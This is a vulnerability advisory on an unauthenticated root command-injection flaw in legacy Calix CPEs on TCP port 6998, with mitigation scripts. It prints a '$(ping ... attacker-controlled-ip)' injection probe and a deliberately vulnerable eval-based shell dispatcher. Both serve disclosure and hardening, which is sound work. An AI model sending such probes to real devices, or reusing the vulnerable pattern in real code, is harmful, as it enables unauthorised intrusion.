Critical Remote Code Execution Vulnerability in Calix Devices via TCP Port 6998

A significant security vulnerability has been identified in certain legacy Calix networking devices, enabling unauthenticated attackers to execute arbitrary code with root privileges. This flaw resides in the devices’ implementation of the CPE WAN Management Protocol (CWMP) on TCP port 6998.

Vulnerability Details

The core issue is missing input validation in the devices’ CWMP (TR-069) service rather than in the protocol itself. Connecting to TCP port 6998 yields a command prompt with no authentication step. Input containing backticks (`) or command-substitution syntax ($()) is evaluated as shell command substitution, so whatever the attacker places inside it runs with the service’s privileges, which on these devices is root.

For instance, an attacker could input:

```
$(ping -c 4 attacker-controlled-ip)
```

If the prompt evaluates the input as shell, the device sends four ICMP echo requests to the attacker-controlled address. Watching for those packets on that host (for example with a tcpdump ICMP filter) confirms code execution without relying on any output being echoed back to the client, which is the usual way to verify a blind command injection.
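The bug class behind that probe, shown as an added shell example rather than anything taken from Calix firmware: a line read from the client is spliced into a command string and re-parsed by the shell, so `$()` and backticks inside it run first. The function names, the `STATUS:` response format and the allowlist are assumptions chosen for this illustration; `echo` stands in for the article’s `ping` so the script runs offline.

```shell
#!/bin/sh
# Added example, not Calix code: the command-substitution injection class from
# the article, reduced to a few lines of shell so the mechanism is visible.

# Vulnerable: the client's input is interpolated into a command string and
# re-parsed by the shell via eval, so any $(...) or `...` inside it executes
# with this script's privileges (root, when the management daemon runs as root).
vulnerable_dispatch() {
    eval "printf '%s\n' \"STATUS: $1\""
}

# Hardened, part 1: a strict allowlist. The value is accepted only if it is
# non-empty and made solely of characters that can never start an expansion.
is_safe_token() {
    case $1 in
        '')                  return 1 ;;   # empty
        *[!A-Za-z0-9._:-]*)  return 1 ;;   # anything outside the allowlist
        *)                   return 0 ;;
    esac
}

# Hardened, part 2: no eval. The value is passed as a separate argument, so
# even if the allowlist were relaxed the shell would never re-parse it.
hardened_dispatch() {
    if ! is_safe_token "$1"; then
        printf 'ERROR: input rejected\n'
        return 1
    fi
    printf 'STATUS: %s\n' "$1"
}

# Constructed inputs: the attacker probe with echo in place of ping, its
# backtick form, and a benign value.
vulnerable_dispatch 'host$(echo INJECTED)'            # prints STATUS: hostINJECTED
vulnerable_dispatch 'host`echo INJECTED`'             # prints STATUS: hostINJECTED
hardened_dispatch  'host$(echo INJECTED)' || true     # prints ERROR: input rejected
hardened_dispatch  '198.51.100.7'                     # prints STATUS: 198.51.100.7
```

The allowlist is deliberately narrow: rejecting a few metacharacters is not enough, because the set of sequences a shell will expand is larger than most denylists anticipate. The real fix is the second half, never letting untrusted bytes reach a shell parser at all.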

Affected Devices

The vulnerability specifically impacts the following end-of-life (EOL) Calix hardware models:

– 812Gv2
– 813Gv2
– 813Gv2-2
– 5VT devices developed by third parties under Calix branding

Additionally, various rebranded devices may be affected, though a comprehensive list is not available. Notably, Calix’s current-generation GigaCenter devices are confirmed to be unaffected, as they do not expose a CWMP (TR-069) service on a local port.

Potential Impact

Exploitation of this vulnerability requires no authentication, making it particularly dangerous. Attackers could leverage this flaw to:

– Establish persistent backdoors
– Exfiltrate sensitive data
– Use the compromised device as a launchpad for further network penetration

Given the root-level access granted, the potential for damage is substantial.

Historical Context

This is not the first significant security issue affecting Calix hardware. In 2022, researchers documented an attack where threat actors exploited GigaCenter devices to install SOCKS proxy servers on port 8111, leading to service degradation and necessitating device reboots to mitigate the issue.

Calix’s Response

Calix has acknowledged the vulnerability, stating:

As the only devices with this vulnerability present appear to be these EOL rebranded systems, we will be closing this issue out. We will create an advisory for our customers who are still deploying these unsupported CPEs.

Because the affected devices are end-of-life, no firmware patch should be expected; replacement is the only full remediation, with the network controls below serving as interim measures.

Recommended Mitigation Steps

Security experts recommend the following actions to mitigate the risk:

1. Identify and Decommission Vulnerable Devices: Conduct a thorough audit to locate and replace any affected hardware.

2. Block Access to Port 6998: Implement network access control lists that drop traffic to TCP port 6998 on every router and firewall between untrusted networks and the CPE, since the device itself cannot be fixed.

3. Isolate Legacy Hardware: Ensure that any remaining legacy devices are segregated from critical network segments to limit potential exposure.

4. Implement Network Segmentation: Design the network architecture to contain potential compromises, preventing lateral movement by attackers.
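The audit, block and isolate steps above, as an added shell example for a Linux router or jump host upstream of the CPEs (not code from the original article or from Calix). The nftables table, chain and set names (`calix_legacy`, `quarantine`), the 192.0.2.0/24 and 10.0.0.0/8 ranges, and the sample scan output are all assumptions constructed for this illustration.

```shell
#!/bin/sh
# Added example, not from the article or Calix: helpers for finding devices
# that expose TCP/6998, blocking that port, and quarantining the hosts found.

# Step 1 (audit): scan the CPE subnet, e.g.
#   nmap -p 6998 -oG - 192.0.2.0/24 > scan.gnmap
# then pipe scan.gnmap into this function. It prints one IP per line for each
# host whose 6998/tcp is reported open; closed and filtered hosts are skipped.
hosts_with_6998_open() {
    awk '/Ports:/ && /6998\/open\/tcp/ { print $2 }'
}

# Step 2 (block): nft rules that drop TCP/6998 both forwarded through this
# host and addressed to it, so the vulnerable prompt is unreachable via here.
nft_block_6998() {
    cat <<'EOF'
add table inet calix_legacy
add chain inet calix_legacy forward { type filter hook forward priority 0; policy accept; }
add chain inet calix_legacy input { type filter hook input priority 0; policy accept; }
add rule inet calix_legacy forward tcp dport 6998 counter drop
add rule inet calix_legacy input tcp dport 6998 counter drop
EOF
}

# Steps 3/4 (isolate/segment): put the identified CPE addresses in a set and
# drop anything they send towards a protected prefix.
#   $1 = whitespace-separated list of CPE IPs, $2 = protected prefix
nft_isolate_hosts() {
    printf 'add set inet calix_legacy quarantine { type ipv4_addr; }\n'
    for ip in $1; do
        printf 'add element inet calix_legacy quarantine { %s }\n' "$ip"
    done
    printf 'add rule inet calix_legacy forward ip saddr @quarantine ip daddr %s counter drop\n' "$2"
}

# Constructed sample of nmap grepable (-oG) output, not a real scan.
SAMPLE_SCAN='Host: 192.0.2.10 ()  Status: Up
Host: 192.0.2.10 ()  Ports: 6998/open/tcp//unknown///  Ignored State: closed (0)
Host: 192.0.2.11 ()  Status: Up
Host: 192.0.2.11 ()  Ports: 6998/closed/tcp//unknown///
Host: 192.0.2.12 ()  Status: Up
Host: 192.0.2.12 ()  Ports: 6998/filtered/tcp//unknown///
Host: 192.0.2.13 ()  Status: Up
Host: 192.0.2.13 ()  Ports: 6998/open/tcp//unknown///  Ignored State: closed (0)'

# Dry run: print the ruleset that "nft -f -" would load for the sample.
exposed=$(printf '%s\n' "$SAMPLE_SCAN" | hosts_with_6998_open)
echo "# hosts exposing TCP/6998: $(printf '%s\n' "$exposed" | wc -l | tr -d ' ')"
nft_block_6998
nft_isolate_hosts "$exposed" 10.0.0.0/8
```

Run the audit against the real subnet and review the list before loading the rules; a host that reports 6998/tcp open is only a candidate until its model is confirmed against the affected list, and a filtered result means the port was not reachable from the scanning host, not that the service is absent.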

Network administrators managing Calix infrastructure should prioritize these steps to protect against this easily exploitable remote code execution vulnerability.